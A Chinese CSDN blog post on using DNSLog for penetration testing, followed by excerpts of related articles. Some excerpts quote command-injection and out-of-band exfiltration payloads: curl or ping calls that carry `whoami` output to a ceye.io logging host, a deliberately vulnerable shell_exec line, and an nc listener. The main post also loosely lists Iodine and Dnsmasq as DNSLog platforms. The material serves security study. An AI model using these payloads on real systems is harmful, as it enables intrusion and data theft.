dnslog使用方法

最新推荐文章于 2024-08-29 14:44:24 发布
最新推荐文章于 2024-08-29 14:44:24 发布
阅读量1.6k 收藏 2
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36232967/article/details/131314599
版权

DNSLog 是一种用于收集和分析恶意软件或渗透测试期间生成的 DNS 请求和响应的工具。在实际使用中,DNSLog 可以用于获取恶意软件的 C&C 服务器、验证域名接入情况、检测恶意软件的行为等。

以下是 DNSLog 的一般使用方法:

  1. 注册账号:首先,你需要在一个支持 DNSLog 的平台上注册账号。有几个开源的 DNSLog 平台可以选择,例如 Iodine、Dnsmasq、Burp Collaborator 等。

  2. 创建域名:在注册的平台上,你可以创建一个自定义的域名,例如 example.dnslog.com。这个域名将用于收集 DNS 请求和响应。

  3. 设置 DNS 配置:将你要测试的系统或应用程序的 DNS 配置中的某个域名或主机名设置为你创建的域名,例如将 targetsystem.com 的 DNS 设置为 example.dnslog.com

  4. 触发 DNS 请求:执行活动或操作,使系统或应用程序向域名发送 DNS 请求,例如运行恶意软件、发送恶意链接或进行渗透测试。

  5. 分析结果:在 DNSLog 平台上查看收到的 DNS 请求和响应。这些请求和响应可能包含与触发活动相关的信息,如 IP 地址、访问时间等。

请注意,使用 DNSLog 应该遵循合法和道德的原则,确保仅在合法且授权的环境中使用。黑客行为和违反法律的使用是严格禁止的。

此外,具体的 DNSLog 使用方法可能会根据所选择的平台而有所不同,你应该参考平台提供的文档和指南以获得更详细的操作说明。

qq_36232967
关注
35-3 使用dnslog探测fastjson漏洞
weixin_43263566的博客
04-10 610
DNSLog是一种记录在DNS上的域名相关信息的机制,类似于日志文件,记录了对域名或IP的访问信息。因特网采用树状结构的命名方法,按照组织结构划分域,每个域都是名字空间中被管理的一个划分,可以进一步划分为子域。当向DNS服务器发起kxsy.work的解析请求时,DNSLog会记录下此次解析,包括解析的域名和对应的IP地址。刷新dnslog服务器的记录,有记录就说明存在漏洞(一开始的4ax的子域名发送请求,刷新看不到,我就获取一个新的子域名做演示,所以下面的截图中的域名跟上一张不一样)将数据包发送到重发器。
快速搭建自用dnslog
寒星的博客
04-21 4238
快速搭建自用dnslog 前言 dnslog是常见的辅助验证漏洞的手段,为什么要自建dnslog? 第三方dnslog在一些特殊时期会受到一股神秘力量影响变得不稳定甚至不能用 有些业务或者信息不方便使用第三方平台 常见的dnslog平台会被安全产品检测到 网上已经有很多开源的dnslog平台,且有不少的dnslog搭建教程,但是看下来感觉还是有点麻烦,而且不容易集成到自己平台。对于个人来说,很多步骤其实是可以省略的。前几天原来的dnslog的域名到期了,又重新买了个新的重新搭建了一次。正好分享一下我是如
dnslog在线平台
最新发布
Lucker_YYY的博客
08-29 635
分享几个好用的在线平台。
DNSLog使用方法
热门推荐
weixin_37104668的博客
09-14 1万+
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 DNSLOG工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog
DNSlog使用
weixin_48000706的博客
07-31 1356
【代码】DNSlog使用
DNSLog使用
weixin_51151193的博客
12-29 1221
DNSLog基本使用
通过Dnslog判断是否使用fastjson
XZ_______的博客
04-19 1220
扫码关注公众号获取更多资料
命令执行无回显的判断方法DNSLOG相关例题的讲解
blue_fantasy的博客
01-10 1752
Text. 命令无回显的情况 判断方法 1.延时 2.HTTP请求 3.DNS请求 <?php highlight_file(__FILE__); shell_exec($_GET[1]); ?> (1)通过传入1=ls|sleep(3) 页面加载3秒左右才显示来证明注入语句带入成功 传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000 (2)通过提前nc监听,利用curl命令进行信息获取 (3)提前注册ceye.io平
mysql dnslog_渗透技巧:使用dnslog加快盲注速度 · C1imber’s Blog
weixin_34624426的博客
02-07 638
sql盲注分为基于bool的盲注和基于时间的盲注,大家都知道,盲注是在页面没有显示位并且没有报错信息的时候,通过构造payload使页面返回的内容不同或者是页面响应的时间不同从而去判断出数据库中的数据,不管是bool盲注还是时间盲注,在进行判断的时候都需要一个字符一个字符的去判断,虽然二分法可以加快盲注的速度,但是还有一种更好的办法,那就是使用dnslog,具体过程如下图由上图可以看出要进行dns...
DNSLog 盲注总结
m0_61506558的博客
10-26 536
总所周知,我们输入的域名需要通过DNS服务器进行解析得到IP地址才能通过IP访问网站,DNSLog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问的信息,类似日志文件。我们只需要搭建一个的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级三级甚至更多级的子域名上去请求,就可以通过DNS解析日志来获取到它们。这样,所有访问 xie.com 的二级三级四级等等子域名都会被解析到我们的VPS上。我们就可以通过查询DNS解析记录来获得命令执行的回显了。(一)DNSLog部署过程。
dnslog:简约的 DNS 日志记录工具
05-31
dns日志 信息 简约的 DNS 日志记录工具。 捕获所有 DNS 流量并将其文本表示(以压缩形式)存储到/var/log/dnslog/<date>.log.gz 。 创建用于网络取证目的。 $ zcat /var/log/dnslog/2018-07-12.log.gz | head 00:00:00.001595 R A 192.168.107.168 192.168.110.233 ocsp.verisign.com 23.37.43.27 00:00:00.001949 Q PTR 192.168.107.146 199.253.182.182 2.6.e.f.a.b.e.f.f.f.6.5.0.5.2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa ? 00:00:00.002314 R AAAA 37.48.122.173 194.5
代码审计-fastjson的dnslog探测方式分析
cdyunaq的博客
12-15 1930
前言 正常测试的时候,发现java后端对json处理都会去测试一下是否存在反序列化,但是后端处理json的组件很多,比如fastjson、jackson、gson等,怎么判断是否使用了fastjson呢? 有一个简便无危害的方式,就是通过dnslog来判断。 大佬们讨论的issue 说明 前面我们在分析的时候,会发现很多有一个变量token在进行判断,比如token == 12 或者 token == 14等,那这个token到底代表啥呢?在com.alibaba.fastjson.parser.
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1116
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
利用DNSlog技术间接判断漏洞是否存在的常用payload
nextdoor6的博客
06-13 4723
0x00 Command Execution i. *nix: curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io ii. windows ping %USERNAME%.b182oj.ceye.io 0x01 SQL Injection From http://docs.
使用DNSLog进行DNS请求追踪与分析
聚娃科技开发者博客
06-28 529
DNSLog提供了一种简单而有效的方式来捕获和分析DNS请求,从而帮助解决这些问题。是一种用于捕获和分析DNS(Domain Name System)请求的工具,它可以帮助开发人员和网络管理员监控和分析域名解析过程中的各种请求和响应。通常,DNSLog可以作为一个开源工具或服务提供,您可以在互联网上找到相应的文档和指南来安装和配置它。DNS请求的追踪和分析对于网络应用程序的性能优化和问题排查至关重要。通过配置DNSLog,您可以捕获并分析这些DNS解析请求,以便进一步分析和优化。
dnslog.cn的使用
weixin_43622525的博客
12-04 9095
网站首页 1点击 Get SubDomain 2复制1x7ojc.dnslog.cn 3打开cmd命令行 4输入nslookup1x7ojc.dnslog.cn 5回到dnslog.cn点击Refresh Record 总结: 用来判断是否可以连接外网
Dnslog在SQL注入中的利用
weixin_33754913的博客
07-11 329
参考文献:www.anquanke.com/post/id/98096https://bbs.pediy.com/thread-223881.htm DNSlog在Web攻击的利用 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获得的数据外带出来。 常用...
DNSLog注入及SQLmap工具使用
2301_80034711的博客
03-18 1153
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLog。Sqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据库服务器的权限。
dnslog测试方法
07-28
要测试 DNSlog 的功能和效果,您可以按照以下方法进行操作: 1. 注册一个 DNSlog 服务:首先,您需要找到一个可信赖的 DNSlog 服务提供商并注册一个账户。一些常见的 DNSlog 服务提供商包括 VirusTotal、Security...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_36232967

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值